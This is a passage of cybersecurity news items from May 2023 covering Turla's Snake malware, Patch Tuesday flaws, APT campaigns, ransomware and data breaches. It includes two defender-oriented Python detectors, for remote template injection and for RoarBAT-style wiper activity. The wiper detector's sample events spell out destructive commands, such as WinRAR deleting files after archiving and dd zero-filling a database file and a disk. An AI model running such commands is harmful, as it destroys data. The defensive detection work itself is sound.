Snake, according to an advisory released by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), is designed as a covert tool for long-term intelligence collection on high-priority targets, enabling the adversary to create a peer-to-peer (P2P) network of compromised systems across the world.

What's more, several systems in the P2P network served as relay nodes to route disguised operational traffic to and from Snake malware implanted on FSB's ultimate targets, making the activity challenging to detect.

The C-based cross-platform malware further employs custom communication methods to add a new layer of stealth and features a modular architecture that allows for an efficient way to inject or modify components to augment its capabilities and retain persistent access to valuable information.

"Snake demonstrates careful software engineering design and implementation, with the implant containing surprisingly few bugs given its complexity," CISA said, adding initial versions of the implant were developed around early 2004.

"The name Uroburos is appropriate, as the FSB cycled it through nearly constant stages of upgrade and redevelopment."

Infrastructure associated with the Kremlin-backed group has been identified in over 50 countries across North America, South America, Europe, Africa, Asia, and Australia, although its targeting is assessed to be more tactical, encompassing government networks, research facilities, and journalists.

Victimized sectors within the U.S. include education, small businesses, and media organizations, as well as critical infrastructure sectors such as government facilities, financial services, critical manufacturing, and communications.

Despite these setbacks, Turla remains an active and formidable adversary, unleashing an array of tactics and tools to breach its targets across Windows, macOS, Linux, and Android.

The development comes a little over a year after U.S. law enforcement and intelligence agencies disarmed a modular botnet known as Cyclops Blink controlled by another Russian nation-state actor referred to as Sandworm.


Microsoft's May Patch Tuesday Fixes 38 Flaws, Including Active Zero-Day Bug
10.5.23  Vulnerebility  The Hacker News
Microsoft has rolled out Patch Tuesday updates for May 2023 to address 38 security flaws, including one zero-day bug that it said is being actively exploited in the wild.

Trend Micro's Zero Day Initiative (ZDI) said the volume is the lowest since August 2021, although it pointed out that "this number is expected to rise in the coming months."

Of the 38 vulnerabilities, six are rated Critical and 32 are rated Important in severity. Eight of the flaws have been tagged with "Exploitation More Likely" assessment by Microsoft.

This is aside from 18 flaws – including 11 bugs since the start of May – the Windows maker resolved in its Chromium-based Edge browser following the release of April Patch Tuesday updates.

Topping the list is CVE-2023-29336 (CVSS score: 7.8), a privilege escalation flaw in Win32k that has come under active exploitation. It's not immediately clear how widespread the attacks are.

"An attacker who successfully exploited this vulnerability could gain SYSTEM privileges," Microsoft said, crediting Avast researchers Jan Vojtěšek, Milánek, and Luigino Camastra for reporting the flaw.

The development has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add the flaw to its Known Exploited Vulnerabilities (KEV) catalog, urging organizations to apply vendor fixes by May 30, 2023.

Also of note are two publicly known flaws, one of which is a critical remote code execution flaw impacting Windows OLE (CVE-2023-29325, CVSS score: 8.1) that could be weaponized by an actor by sending a specially crafted email to the victim.

Microsoft, as mitigations, is recommending that users read email messages in plain text format to protect against this vulnerability.

The second publicly known vulnerability is CVE-2023-24932 (CVSS score: 6.7), a Secure Boot security feature bypass that's weaponized by the BlackLotus UEFI bootkit to exploit CVE-2022-21894 (aka Baton Drop), which was resolved in January 2022.

"This vulnerability allows an attacker to execute self-signed code at the Unified Extensible Firmware Interface (UEFI) level while Secure Boot is enabled," Microsoft said in a separate guidance.

"This is used by threat actors primarily as a persistence and defense evasion mechanism. Successful exploitation relies on the attacker having physical access or local admin privileges on the targeted device."

It's worth noting that the fix shipped by Microsoft is disabled by default and requires customers to manually apply the revocations, but not before updating all bootable media.

"Once the mitigation for this issue is enabled on a device, meaning the revocations have been applied, it cannot be reverted if you continue to use Secure Boot on that device," Microsoft cautioned. "Even reformatting of the disk will not remove the revocations if they have already been applied."

The tech giant said it's taking a phased approach to completely plug the attack vector to avoid unintended disruption risks, an exercise that's expected to stretch until the first quarter of 2024.

"Modern UEFI-based Secure Boot schemes are extremely complicated to configure correctly and/or to reduce their attack surfaces meaningfully," firmware security firm Binarly noted earlier this March. "That being said, bootloader attacks are not likely to disappear anytime soon."


U.S. Authorities Seize 13 Domains Offering Criminal DDoS-for-Hire Services
10.5.23  Crime  The Hacker News
U.S. authorities have announced the seizure of 13 internet domains that offered DDoS-for-hire services to other criminal actors.

The takedown is part of an ongoing international initiative dubbed Operation PowerOFF that's aimed at dismantling criminal DDoS-for-hire infrastructures worldwide.

The development comes almost five months after a "sweep" in December 2022 dismantled 48 similar services for abetting paying users to launch distributed denial-of-service (DDoS) attacks against targets of interest.

This includes school districts, universities, financial institutions, and government websites, according to the U.S. Department of Justice (DoJ).

Ten of the 13 illicit domains seized are "reincarnations" of booter or stresser services that were previously shuttered towards the end of last year.

"In recent years, booter services have continued to proliferate, as they offer a low barrier to entry for users looking to engage in cybercriminal activity," DoJ said in a press release on Monday.

"In addition to harming victims by disrupting or degrading access to the internet, attacks from booter services can also completely sever internet connections for other customers served by the same internet service provider via a shared connection point."

Parallel to the domain seizures, the DoJ also said that four of the six individuals who were charged in December 2022 in connection with operating the services have entered into a guilty plea.

The defendants – Jeremiah Sam Evans Miller, 23, of San Antonio, Texas; Angel Manuel Colon Jr., 37, of Belleview, Florida; Shamar Shattock, 19, of Margate, Florida; and Cory Anthony Palmer, 23, of Lauderhill, Florida – are expected to be sentenced later this year.

Try2Check Card-Checking Service Goes Down
The announcement comes days after the disruption, following a decade-long investigation, of Try2Check (aka Try2Services), an illegal online platform that enabled threat actors to check the status of stolen credit card numbers in their possession and determine if they were valid and active.

The DoJ also charged a 43-year-old Russian national, Denis Gennadievich Kulkov, for his role in creating and turning the service into a "primary tool of the illicit credit card trade," with the State Department offering a $10 million reward for information leading to his arrest.

The department is further extending a separate bounty of up to $1 million for any specifics that will help to identify other key leaders of the Try2Check cybercrime group.

The fraudulent platform, per the indictment, allegedly misused the systems of a prominent U.S.-based payment processing firm to perform the card checks by exploiting its preauthorization service. The name of the company was not disclosed.

Try2Check, which launched in 2005, is estimated to have processed tens of millions of credit card checks every year and facilitated the operations of several major card shops like Joker's Stash that specialized in bulk trafficking of stolen credit cards. As of February 2022, a single card check cost $0.20.

"Through the illegal operation of his websites, the defendant made at least $18 million in bitcoin (as well as an unknown amount through other payment systems), which he used to purchase a Ferrari, among other luxury items," the DoJ noted.

The indictment against Kulkov also arrives weeks after Denis Mihaqlovic Dubnikov, who pleaded guilty to charges of money laundering for the Ryuk ransomware gang earlier this year, was sentenced to time served and ordered to forfeit $2,000 in illegal profits.


Operation ChattyGoblin: Hackers Targeting Gambling Firms via Chat Apps
10.5.23  Hacking  The Hacker News
A gambling company in the Philippines was the target of a China-aligned threat actor as part of a campaign that has been ongoing since October 2021.

Slovak cybersecurity firm ESET is tracking the series of attacks against Southeast Asian gambling companies under the name Operation ChattyGoblin.

"These attacks use a specific tactic: targeting the victim companies' support agents via chat applications – in particular, the Comm100 and LiveHelp100 apps," ESET said in a report shared with The Hacker News.

The use of a trojanized Comm100 installer to deliver malware was first documented by CrowdStrike in October 2022. The company attributed the supply chain compromise to a threat actor likely with associations to China.

The attack chains leverage the aforementioned chat apps to distribute a C# dropper that, in turn, deploys another C# executable, which ultimately serves as a conduit to drop a Cobalt Strike beacon on hacked workstations.

Also highlighted in ESET's APT Activity Report Q4 2022–Q1 2023 are attacks mounted by India-linked threat actors Donot Team and SideWinder against government institutions in South Asia.

Another set of limited attacks has been tied to another Indian APT group called Confucius that's been active since at least 2013 and is believed to share ties with the Patchwork group. The threat actor has in the past used Pegasus-themed lures and other decoy documents to target Pakistan government agencies.

The latest intrusion, per ESET, involved the use of a remote access trojan dubbed Ragnatela that's an upgraded variant of the BADNEWS RAT.

Elsewhere, the cybersecurity company said it detected the Iranian threat actor referred to as OilRig (aka Hazel Sandstorm) deploying a custom implant labeled Mango to an Israeli healthcare company.

It's worth noting that Microsoft recently attributed Storm-0133, an emerging threat cluster affiliated to Iran's Ministry of Intelligence and Security (MOIS), to attacks exclusively targeting Israeli local government agencies and companies serving the defense, lodging, and healthcare sectors.

"The MOIS group used the legitimate yet compromised Israeli website for command-and-control (C2), demonstrating an improvement in operational security, as the technique complicates defenders' efforts, which often leverage geolocation data to identify anomalous network activity," Microsoft noted, further pointing out Storm-0133's reliance on the Mango malware in these intrusions.

ESET also said an unnamed Indian data management services provider was at the receiving end of an attack mounted by the North Korea-backed Lazarus Group in January 2023 using an Accenture-themed social engineering lure.

"The goal of the attackers was to monetize their presence in the company's network, most likely through business email compromise," the company said, calling it a shift from its traditional victimology patterns.

The Lazarus Group, in February 2023, is also said to have breached a defense contractor in Poland via fake job offers to initiate an attack chain that weaponizes a modified version of SumatraPDF to deploy a RAT called ScoringMathTea and a sophisticated downloader codenamed ImprudentCook.

Rounding off the list is a spear-phishing activity from Russia-aligned APT groups such as Gamaredon, Sandworm, Sednit, The Dukes, and SaintBear, the last of which has been detected employing an updated version of its Elephant malware framework and a novel Go-based backdoor known as ElephantLauncher.

Other notable APT activity spotted during the time period comprises that of Winter Vivern and YoroTrooper, which ESET said strongly overlaps with a group that it has been tracking under the name SturgeonPhisher since the start of 2022.

Evidence gathered so far points to YoroTrooper being active since at least 2021, with attacks singling out government, energy, and international organizations across Central Asia and Europe.

Public disclosure of its tactics in March 2023 is suspected to have led to a "big drop in activity," raising the possibility that the group is currently retooling its arsenal and altering its modus operandi.

ESET's findings follow Kaspersky's own APT trends report for Q1 2023, which unearthed a previously unknown threat actor christened Trila targeting Lebanese government entities using "homebrewed malware that enables them to remotely execute Windows system commands on infected machines."

The Russian cybersecurity company also called attention to the discovery of a new Lua-based malware strain referred to as DreamLand targeting a government entity in Pakistan, marking one of the rare instances where an APT actor has used the programming language in active attacks.

"The malware is modular and utilizes the Lua scripting language in conjunction with its Just-in-Time (JIT) compiler to execute malicious code that is difficult to detect," Kaspersky researchers said.

"It also features various anti-debugging capabilities and employs Windows APIs through Lua FFI, which utilizes C language bindings to carry out its activities."


Researchers Uncover SideWinder's Latest Server-Based Polymorphism Technique
10.5.23  APT  The Hacker News
The advanced persistent threat (APT) actor known as SideWinder has been accused of deploying a backdoor in attacks directed against Pakistan government organizations as part of a campaign that commenced in late November 2022.

"In this campaign, the SideWinder advanced persistent threat (APT) group used a server-based polymorphism technique to deliver the next stage payload," the BlackBerry Research and Intelligence Team said in a technical report published Monday.

Another campaign discovered by the Canadian cybersecurity company in early March 2023 shows that Turkey has also landed in the crosshairs of the threat actor's collection priorities.

SideWinder has been on the radar since at least 2012 and it's primarily known to target various Southeast Asian entities located across Pakistan, Afghanistan, Bhutan, China, Myanmar, Nepal, and Sri Lanka.

Suspected to be an Indian state-sponsored group, SideWinder is also tracked under the monikers APT-C-17, APT-Q-39, Hardcore Nationalist (HN2), Rattlesnake, Razor Tiger, and T-APT4.

Typical attack sequences mounted by the actor entail using carefully crafted email lures and DLL side-loading techniques to fly under the radar and deploy malware capable of granting the actors remote access to the targeted systems.

Over the past year, SideWinder has been linked to a cyber attack aimed at Pakistan Navy War College (PNWC) as well as an Android malware campaign that leveraged rogue phone cleaner and VPN apps uploaded to the Google Play Store to harvest sensitive information.

The latest infection chain documented by BlackBerry mirrors findings from Chinese cybersecurity firm QiAnXin in December 2022 detailing the use of PNWC lure documents to drop a lightweight .NET-based backdoor (App.dll) that's capable of retrieving and executing next-stage malware from a remote server.

What makes the campaign also stand out is the threat actor's use of server-based polymorphism as a way to potentially sidestep traditional signature-based antivirus (AV) detection and distribute additional payloads by responding with two different versions of an intermediate RTF file.

Specifically, the PNWC document employs a method known as remote template injection to fetch the RTF file such that it harbors the malicious code only if the request originates from a user in the Pakistan IP address range.

"It is important to note that in both instances, only the name of the file 'file.rtf' and the file type are the same; however, the contents, file size and the file hash are different," BlackBerry explained.

"If the user is not in the Pakistani IP range, the server returns an 8-byte RTF file (file.rtf) that contains a single string: {\rtf1 }. However, if the user is within the Pakistani IP range, the server then returns the RTF payload, which varies between 406 KB – 414 KB in size."

The disclosure arrives shortly after Fortinet and Team Cymru revealed a new set of attacks perpetrated by a Pakistan-based threat actor known as SideCopy against Indian defense and military targets.

"The latest SideWinder campaign targeting Turkey overlaps with the most recent developments in geopolitics; specifically, in Turkey's support of Pakistan and the ensuing reaction from India," BlackBerry said.
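The two defender-side checks implied by the BlackBerry write-up are (a) whether a Word document declares an external template at all, since that is the remote template injection mechanism the lure relies on, and (b) whether the template server hands different content to different clients, the "server-based polymorphism" the article describes (an 8-byte {\rtf1 } stub for off-target clients, a much larger RTF for clients in the targeted IP range). The code below is an added example written for this page, not BlackBerry's or SideWinder's code; the OOXML relationship type and file path are the standard ones, while the sample .docx and RTF bodies are constructed test fixtures.

```python
import hashlib
import io
import re
import zipfile
from typing import Dict, List, Optional
from xml.etree import ElementTree as ET

# Standard OOXML relationship type used when a .docx loads its template from elsewhere.
ATTACHED_TEMPLATE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
SETTINGS_RELS = "word/_rels/settings.xml.rels"


def remote_template_targets(docx_bytes: bytes) -> List[str]:
    """Return external attachedTemplate URLs declared in word/_rels/settings.xml.rels.

    A document whose template lives at a URL is the remote template injection
    setup described in the article; most benign documents have no such entry.
    """
    targets: List[str] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if SETTINGS_RELS not in zf.namelist():
            return targets
        root = ET.fromstring(zf.read(SETTINGS_RELS))
        for rel in root.iter(f"{{{REL_NS}}}Relationship"):
            if rel.get("Type") == ATTACHED_TEMPLATE and rel.get("TargetMode") == "External":
                targets.append(rel.get("Target", ""))
    return targets


def classify_rtf(data: bytes) -> str:
    """Classify a fetched template body as 'stub', 'payload' or 'not_rtf'.

    The article quotes the server returning the single string {\\rtf1 } (8 bytes)
    to clients outside the targeted IP range and a ~400 KB RTF to those inside it.
    """
    if not data.startswith(b"{\\rtf1"):
        return "not_rtf"
    if re.fullmatch(rb"\{\\rtf1\s*\}\s*", data):
        return "stub"
    return "payload"


def served_content_varies(responses: Dict[str, bytes]) -> bool:
    """True when the same URL yielded different bodies from different vantage points.

    Comparing hashes (not just file names or types) is the point the article
    makes: 'file.rtf' kept its name while size and hash differed per client.
    """
    digests = {hashlib.sha256(body).hexdigest() for body in responses.values()}
    return len(digests) > 1


def build_test_docx(template_url: Optional[str]) -> bytes:
    """Constructed minimal .docx-shaped zip with an optional external template entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        parts = [f'<Relationships xmlns="{REL_NS}">']
        if template_url:
            parts.append(
                f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
                f'Target="{template_url}" TargetMode="External"/>'
            )
        parts.append("</Relationships>")
        zf.writestr(SETTINGS_RELS, "".join(parts))
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed inputs: a placeholder template host and two vantage-point responses.
    doc = build_test_docx("http://template.example.invalid/file.rtf")
    print("external templates:", remote_template_targets(doc))
    responses = {"vantage_A": b"{\\rtf1 }", "vantage_B": b"{\\rtf1\\ansi constructed-body}"}
    for name, body in responses.items():
        print(name, classify_rtf(body))
    print("content varies by client:", served_content_varies(responses))
```

In practice the first check runs on inbound attachments (a flagged document is worth detonating or blocking before a user opens it), and the second is an analyst workflow: fetch the declared template URL from more than one network position and compare hashes, which turns the attacker's geofencing into a detection signal rather than an evasion.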


Microsoft Warns of State-Sponsored Attacks Exploiting Critical PaperCut Vulnerability
10.5.23  Exploit  The Hacker News
Iranian nation-state groups have now joined financially motivated actors in actively exploiting a critical flaw in PaperCut print management software, Microsoft disclosed over the weekend.

The tech giant's threat intelligence team said it observed both Mango Sandstorm (Mercury) and Mint Sandstorm (Phosphorus) weaponizing CVE-2023-27350 in their operations to achieve initial access.

"This activity shows Mint Sandstorm's continued ability to rapidly incorporate [proof-of-concept] exploits into their operations," Microsoft said in a series of tweets.

On the other hand, CVE-2023-27350 exploitation activity associated with Mango Sandstorm is said to be on the lower end of the spectrum, with the state-sponsored group "using tools from prior intrusions to connect to their C2 infrastructure."

It's worth noting that Mango Sandstorm is linked to Iran's Ministry of Intelligence and Security (MOIS) and Mint Sandstorm is associated with the Islamic Revolutionary Guard Corps (IRGC).

The ongoing assault comes weeks after Microsoft confirmed the involvement of Lace Tempest, a cybercrime gang that overlaps with other hacking groups like FIN11, TA505, and Evil Corp, in abusing the flaw to deliver Cl0p and LockBit ransomware.

CVE-2023-27350 (CVSS score: 9.8) relates to a critical flaw in PaperCut MF and NG installations that could be exploited by an unauthenticated attacker to execute arbitrary code with SYSTEM privileges.

A patch was made available by PaperCut on March 8, 2023. Trend Micro's Zero Day Initiative (ZDI), which discovered and reported the issue, is expected to release more technical information about it on May 10, 2023.

What's more, cybersecurity firm VulnCheck, last week, published details on a new line of attack that can circumvent existing detections, enabling adversaries to leverage the flaw unimpeded.

With more attackers jumping in on the PaperCut exploitation bandwagon to breach vulnerable servers, it's imperative that organizations move quickly to apply the necessary updates (versions 20.1.7, 21.2.11, and 22.0.9 and later).

The development also follows a report from Microsoft which revealed that Iranian threat actors are increasingly relying on a new tactic that combines offensive cyber operations with multi-pronged influence operations to "fuel geopolitical change in alignment with the regime's objectives."

The shift coincides with an increased tempo in adopting newly reported vulnerabilities, the use of compromised websites for command-and-control to better conceal the source of attacks, and harnessing custom tooling and tradecraft for maximum impact.


New Ransomware Strain 'CACTUS' Exploits VPN Flaws to Infiltrate Networks
10.5.23  Ransomware  The Hacker News
Ransomware
Cybersecurity researchers have shed light on a new ransomware strain called CACTUS that has been found to leverage known flaws in VPN appliances to obtain initial access to targeted networks.

"Once inside the network, CACTUS actors attempt to enumerate local and network user accounts in addition to reachable endpoints before creating new user accounts and leveraging custom scripts to automate the deployment and detonation of the ransomware encryptor via scheduled tasks," Kroll said in a report shared with The Hacker News.

The ransomware has been observed targeting large commercial entities since March 2023, with attacks employing double extortion tactics to steal sensitive data prior to encryption. No data leak site has been identified to date.

Following a successful exploitation of vulnerable VPN devices, an SSH backdoor is set up to maintain persistent access and a series of PowerShell commands are executed to conduct network scanning and identify a list of machines for encryption.

CACTUS attacks also utilize Cobalt Strike and a tunneling tool referred to as Chisel for command-and-control, alongside remote monitoring and management (RMM) software like AnyDesk to push files to the infected hosts.

Steps are also taken to disable and uninstall security solutions, as well as to extract credentials from web browsers and the Local Security Authority Subsystem Service (LSASS) in order to escalate privileges.

Privilege escalation is followed by lateral movement, data exfiltration, and ransomware deployment, the last of which is achieved by means of a PowerShell script that has also been used by Black Basta.

A novel aspect of CACTUS is the use of a batch script to extract the ransomware binary with 7-Zip, followed by removing the .7z archive before executing the payload.

"CACTUS essentially encrypts itself, making it harder to detect and helping it evade antivirus and network monitoring tools," Laurie Iacono, associate managing director for cyber risk at Kroll, told The Hacker News.

"This new ransomware variant under the name CACTUS leverages a vulnerability in a popular VPN appliance, showing threat actors continue to target remote access services and unpatched vulnerabilities for initial access."

The development comes days after Trend Micro shed light on another type of ransomware known as Rapture that bears some similarities to other families such as Paradise.

"The whole infection chain spans three to five days at most," the company said, with the initial reconnaissance followed by the deployment of Cobalt Strike, which is then used to drop the .NET-based ransomware.

The intrusion is suspected to be facilitated through vulnerable public-facing websites and servers, making it imperative that companies take steps to keep systems up-to-date and enforce the principle of least privilege (PoLP).

"Although its operators use tools and resources that are readily available, they have managed to use them in a way that enhances Rapture's capabilities by making it stealthier and more difficult to analyze," Trend Micro said.

CACTUS and Rapture are the latest additions to a long list of new ransomware families that have come to light in recent weeks, including Gazprom, BlackBit, UNIZA, Akira, and a NoCry ransomware variant called Kadavro Vector.


MSI Data Breach: Private Code Signing Keys Leaked on the Dark Web
10.5.23  Cyber  The Hacker News
MSI Data Breach
The threat actors behind the ransomware attack on Taiwanese PC maker MSI last month have leaked the company's private code signing keys on their dark website.

"Confirmed, Intel OEM private key leaked, causing an impact on the entire ecosystem," Alex Matrosov, founder and CEO of firmware security firm Binarly, said in a tweet over the weekend.

"It appears that Intel Boot Guard may not be effective on certain devices based on the 11th Tiger Lake, 12th Alder Lake, and 13th Raptor Lake."

Present in the leaked data are firmware image signing keys associated with 57 PCs and private signing keys for Intel Boot Guard used on 116 MSI products. The Boot Guard keys from MSI are believed to impact several device vendors, including Intel, Lenovo and Supermicro.

Intel Boot Guard is a hardware-based security technology that's designed to protect computers against executing tampered UEFI firmware.

The development comes a month after MSI fell victim to a double extortion ransomware attack perpetrated by a new ransomware gang known as Money Message.

MSI Data Breach
MSI, in a regulatory filing at the time, said, "the affected systems have gradually resumed normal operations, with no significant impact on financial business." It, however, urged users to obtain firmware/BIOS updates only from its official website and refrain from downloading files from other sources.

The leak of the Intel Boot Guard keys poses significant risks as it undermines a vital firmware integrity check and could allow threat actors to sign malicious updates and other payloads and deploy them on targeted systems without raising any red flags.

It also follows another advisory from MSI recommending users to be on the lookout for fraudulent emails targeting the online gaming community that claim to be from the company under the pretext of a potential collaboration.

This is not the first time UEFI firmware code has entered the public domain. In October 2022, Intel acknowledged the leak of Alder Lake BIOS source code by a third party, which also included the private signing key used for Boot Guard.

Supermicro Products Not Impacted
Following the publication of the story, Supermicro told The Hacker News that it investigated the risks stemming from the leak of Intel Boot Guard keys and that its products are not affected.

"Based on our current review and investigation, Supermicro products are not affected," a spokesperson for the San Jose-based company said.

"Intel is aware of these reports and actively investigating," the chipmaker told The Hacker News in a statement.

"There have been researcher claims that private signing keys are included in the data including MSI OEM Signing Keys for Intel Boot Guard. It should be noted that Intel Boot Guard OEM keys are generated by the system manufacturer, and these are not Intel signing keys."


SideCopy Using Action RAT and AllaKore RAT to infiltrate Indian Organizations
8.5.23  Virus  The Hacker News
SideCopy Hackers
The suspected Pakistan-aligned threat actor known as SideCopy has been observed leveraging themes related to the Indian military research organization as part of an ongoing phishing campaign.

This involves using a ZIP archive lure pertaining to India's Defence Research and Development Organization (DRDO) to deliver a malicious payload capable of harvesting sensitive information, Fortinet FortiGuard Labs said in a new report.

The cyber espionage group, with activity dating back to at least 2019, targets entities that align with Pakistan government interests. It's believed to share overlaps with another Pakistani hacking crew called Transparent Tribe.

SideCopy's use of DRDO-related decoys for malware distribution was previously flagged by Cyble and Chinese cybersecurity firm QiAnXin in March 2023, and again by Team Cymru last month.

Interestingly, the same attack chains have been observed to load and execute Action RAT as well as an open source remote access trojan known as AllaKore RAT.

The latest infection sequence documented by Fortinet is no different, leading to the deployment of an unspecified strain of RAT that's capable of communicating with a remote server and launching additional payloads.

The development is an indication that SideCopy has continued to carry out spear-phishing email attacks that use Indian government and defense forces-related social engineering lures to drop a wide range of malware.

SideCopy Hackers
Source: Team Cymru
Further analysis of the Action RAT command-and-control (C2) infrastructure by Team Cymru has identified outbound connections from one of the C2 server IP addresses to another address 66.219.22[.]252, which is geolocated in Pakistan.

The cybersecurity company also said it observed "communications sourced from 17 distinct IPs assigned to Pakistani mobile providers and four Proton VPN nodes," noting inbound connections to the IP address from IP addresses assigned to Indian ISPs.

In all, as many as 18 distinct victims in India have been detected as connecting to C2 servers associated with Action RAT and 236 unique victims, again located in India, connecting to C2 servers associated with AllaKore RAT.

The latest findings lend credence to SideCopy's Pakistan links and underscore the fact that the campaign has been successful in targeting Indian users.

"The Action RAT infrastructure, connected to SideCopy, is managed by users accessing the Internet from Pakistan," Team Cymru said. "Victim activity predated the public reporting of this campaign, in some cases by several months."


CERT-UA Warns of SmokeLoader and RoarBAT Malware Attacks Against Ukraine
8.5.23  Virus  The Hacker News
SmokeLoader
An ongoing phishing campaign with invoice-themed lures is being used to distribute the SmokeLoader malware in the form of a polyglot file, according to the Computer Emergency Response Team of Ukraine (CERT-UA).

The emails, per the agency, are sent using compromised accounts and come with a ZIP archive that, in reality, is a polyglot file containing a decoy document and a JavaScript file.

The JavaScript code is then used to launch an executable that paves the way for the execution of the SmokeLoader malware. SmokeLoader, first detected in 2011, is a loader whose main objective is to download or load a stealthier or more effective malware onto infected systems.

CERT-UA attributed the activity to a threat actor it calls UAC-0006 and characterized it as a financially motivated operation carried out with the goal of stealing credentials and making unauthorized fund transfers.

In a related advisory, Ukraine's cybersecurity authority also revealed details of destructive attacks orchestrated by a group known as UAC-0165 against public sector organizations.

The attack, which targeted an unnamed state organization, entailed the use of a new batch script-based wiper malware called RoarBAT that performs a recursive search for files with a specific list of extensions and irrevocably deletes them using the legitimate WinRAR utility.

This, in turn, was achieved by archiving the identified files using the "-df" command-line option and subsequently purging the created archives. The batch script was executed by means of a scheduled task.

RoarBAT Malware
Simultaneously, Linux systems were compromised using a bash script that leveraged the dd utility to overwrite files with zero bytes, effectively avoiding detection by security software.
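As an added example (not code from CERT-UA or from the page), this is the kind of detection logic a defender could run over process-creation events to surface the three behaviours described above: WinRAR invoked with "-df" to delete files after archiving, a scheduled task whose action is a batch script, and dd zero-filling a regular file. The events, host names and paths are constructed sample data.

```python
import shlex
from pathlib import PurePosixPath, PureWindowsPath
from typing import Dict, List, Optional

# Constructed process-creation events (sample data, not from the page), in the
# shape a SIEM would hand over after parsing Windows 4688 / Sysmon 1 records or
# auditd EXECVE records: host, OS family and the full command line.
SAMPLE_EVENTS = [
    {"host": "fs01", "os": "windows",
     "cmd": r'"C:\Program Files\WinRAR\Rar.exe" a -r -df -inul C:\Windows\Temp\out.rar C:\Shares\Finance\*.xlsx C:\Shares\Finance\*.docx'},
    {"host": "fs01", "os": "windows",
     "cmd": r'schtasks /create /tn Updater /sc minute /mo 5 /tr C:\Users\Public\run.bat /ru SYSTEM'},
    {"host": "ws07", "os": "windows",
     "cmd": r'"C:\Program Files\WinRAR\Rar.exe" a -r backup.rar C:\Users\alice\Documents\*'},
    {"host": "app02", "os": "linux",
     "cmd": "dd if=/dev/zero of=/var/lib/app/data.db bs=1M"},
    {"host": "app02", "os": "linux",
     "cmd": "dd if=/dev/zero of=/dev/sdb bs=4M status=progress"},
    {"host": "app02", "os": "linux",
     "cmd": "tar czf /backup/etc.tgz /etc"},
]

WINRAR_IMAGES = {"rar.exe", "winrar.exe"}
BATCH_EXTENSIONS = (".bat", ".cmd")


def _tokens(event: Dict[str, str]) -> List[str]:
    # Windows command lines keep backslashes literal, so POSIX escaping is off there.
    return shlex.split(event["cmd"], posix=(event["os"] != "windows"))


def _image_name(token: str, os_name: str) -> str:
    token = token.strip('"')
    path = PureWindowsPath(token) if os_name == "windows" else PurePosixPath(token)
    return path.name.lower()


def classify(event: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return a finding for one event, or None if it matches no rule."""
    toks = _tokens(event)
    if not toks:
        return None
    image = _image_name(toks[0], event["os"])
    args = [t.lower() for t in toks[1:]]

    # Rule 1: WinRAR told to delete source files after archiving (-df).
    # Recursion (-r) over wildcards is the RoarBAT shape rather than a
    # one-off move-to-archive, so it raises the severity.
    if image in WINRAR_IMAGES and "-df" in args:
        severity = "high" if "-r" in args else "medium"
        return {"rule": "winrar-delete-after-archive", "severity": severity}

    # Rule 2: a scheduled task whose action is a batch script (the way the
    # wiper script was launched); common enough in admin use to stay medium.
    if image == "schtasks" and "/create" in args and "/tr" in args:
        idx = args.index("/tr") + 1
        action = args[idx].strip('"') if idx < len(args) else ""
        if action.endswith(BATCH_EXTENSIONS):
            return {"rule": "schtasks-runs-batch", "severity": "medium"}

    # Rule 3: dd zero-filling a regular file. Zeroing a whole block device
    # (of=/dev/...) is a different activity and is left to its own rule.
    if image == "dd" and event["os"] != "windows":
        kv = dict(t.split("=", 1) for t in toks[1:] if "=" in t)
        target = kv.get("of", "")
        if kv.get("if") == "/dev/zero" and target.startswith("/") \
                and not target.startswith("/dev/"):
            return {"rule": "dd-zero-fill-regular-file", "severity": "high"}
    return None


def scan(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run every event through classify() and attach host/command context."""
    findings = []
    for ev in events:
        hit = classify(ev)
        if hit:
            findings.append({**hit, "host": ev["host"], "cmd": ev["cmd"]})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['rule']} on {f['host']}: {f['cmd']}")
```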

"It was found that the operability of electronic computers (server equipment, automated user workplaces, data storage systems) was impaired as a result of the destructive impact carried out with the use of appropriate software," CERT-UA said.

"Access to the ICS target of the attack is allegedly obtained by connecting to a VPN using compromised authentication data. The successful implementation of the attack was facilitated by the lack of multi-factor authentication when making remote connections to VPN."

The agency further attributed UAC-0165 with moderate confidence to the notorious Sandworm group (aka FROZENBARENTS, Seashell Blizzard, or Voodoo Bear), which has a history of unleashing wiper attacks since the start of the Russo-Ukrainian war last year.

The link to Sandworm stems from significant overlaps with another destructive attack that hit the Ukrainian state news agency Ukrinform in January 2023, which was tied to the adversarial collective.

The alerts come a week after CERT-UA cautioned of phishing attacks carried out by the Russian state-sponsored group APT28 targeting government entities in the country with fake Windows update notifications.


Western Digital Confirms Customer Data Stolen by Hackers in March Breach
8.5.23  Incident  The Hacker News
Digital storage giant Western Digital confirmed that an "unauthorized third party" gained access to its systems and stole personal information belonging to the company's online store customers.

"This information included customer names, billing and shipping addresses, email addresses and telephone numbers," the San Jose-based company said in a disclosure last week.

"In addition, the database contained, in encrypted format, hashed and salted passwords and partial credit card numbers. We will communicate directly with impacted customers."

The development comes a little over a month after Western Digital divulged a "network security incident" on March 26, 2023, prompting the company to take its cloud services offline.

A subsequent report from TechCrunch last month revealed that the threat actors behind the attack were allegedly in possession of "around 10 terabytes of data," and were negotiating with Western Digital for a ransom of a "minimum 8 figures" to avoid leaking the information.

While the identity of the extortionists was unknown at the time, ALPHV (aka BlackCat) ransomware actors have since taken credit for the theft, issuing an ultimatum on April 18, 2023, to make the payment or risk the release of "important documents" and "priceless artifacts."

The actors have also published various screenshots on their dark web portal, displaying what appears to be video calls, emails, and documents related to Western Digital's incident response efforts in an attempt to indicate continued access to the company's systems even after the hack came to light.

Western Digital said it's aware of the publication of "other alleged Western Digital information," that it's "investigating the validity of this data," and that it has "control over our digital certificate infrastructure."

It has also taken the step of taking its online store offline, which it said is expected to be restored the week of May 15, 2023. Access to My Cloud service was restored on April 13, 2023.


